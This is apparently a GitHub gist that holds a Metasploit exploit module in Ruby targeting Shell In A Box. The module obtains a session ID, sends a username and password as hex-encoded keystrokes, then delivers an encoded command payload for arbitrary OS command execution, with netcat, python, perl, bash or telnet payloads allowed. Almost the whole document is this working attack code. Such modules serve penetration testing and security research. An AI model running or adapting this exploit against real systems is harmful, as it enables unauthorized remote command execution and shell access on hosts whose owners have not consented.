Skip to content

Instantly share code, notes, and snippets.

@carnal0wnage

carnal0wnage/shellinabox.rb

Forked from bcoles/shellinabox.rb
Last active August 29, 2015 14:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save carnal0wnage/39cbe69b5ea47876e2d9 to your computer and use it in GitHub Desktop.
Save carnal0wnage/39cbe69b5ea47876e2d9 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
shellinabox.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => 'Shell In A Box Authenticated Command Execution',
'Description' => %q{
This module uses valid credentials to log in to Shell In A Box and
execute arbitrary operating system commands. Shell In A Box must be
configured to use the system shell (default).
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => %w{ unix linux },
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['URL', 'http://code.google.com/p/shellinabox/']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat python perl bash telnet'
}
},
'Targets' =>
[
# Tested on Shell In A Box version 2.14
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012' # Shell In A Box release date
))
register_options(
[
Opt::RPORT(4200),
OptString.new('USERNAME', [true, 'The username for Shell In A Box']),
OptString.new('PASSWORD', [false, 'The password for Shell In A Box'])
], self.class)
end
#
# Check
#
def check
if get_session_id
return Exploit::CheckCode::Detected
else
vprint_error "#{peer} - Could not get session ID"
end
Exploit::CheckCode::Safe
end
#
# Send commands to server as ASCII hex
#
def execute_command(cmd, opts = {})
req = ''
if !cmd.nil?
cmd.bytes.each do |b|
req << '%.2X' % b
end
end
req << '0D'
vprint_debug "#{peer} - Sending request (#{req.length} bytes): #{cmd}"
res = send_request_cgi(
'method' => 'POST',
'vars_post' => Hash[{
'width' => rand(200),
'height' => rand(200),
'session' => @session_id,
'keys' => req
}.to_a.shuffle]
)
if !res
print_error "#{peer} - Connection failed"
elsif res.code == 200 && res.body =~ /<title>OK<\/title>/
vprint_status "#{peer} - Request sent successfully"
else
print_error "#{peer} - Sending request failed"
end
res = get_response
vprint_status "#{peer} - Received response (#{res.body.length} bytes) [HTTP #{res.code}]"
vprint_debug "#{peer} - Replied: #{res.body}"
res
end
#
# Retrieve session ID
#
def get_session_id
vprint_status "#{peer} - Fetching session ID..."
res = get_response
if !res
vprint_error "#{peer} - Connection failed"
elsif res.code == 200 && res.body =~ /"session":"(.+?)"/
session_id = res.body.match(/"session":"(.+?)"/)[1]
vprint_status "#{peer} - Found session ID: #{session_id}"
else
vprint_error "#{peer} - Could not get session ID"
end
session_id
end
#
# Retrieve server response
#
def get_response
send_request_cgi(
'method' => 'POST',
'vars_post' => Hash[{
'width' => rand(200),
'height' => rand(200),
'session' => @session_id
}.to_a.shuffle]
)
end
#
# Exploit
#
def exploit
# get session id
@session_id = get_session_id
if @session_id.nil?
fail_with Exploit::Failure::Unknown, "#{peer} - Could not get session ID."
end
# login
execute_command datastore['USERNAME']
execute_command datastore['PASSWORD']
# send payload
execute_command payload.encoded
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment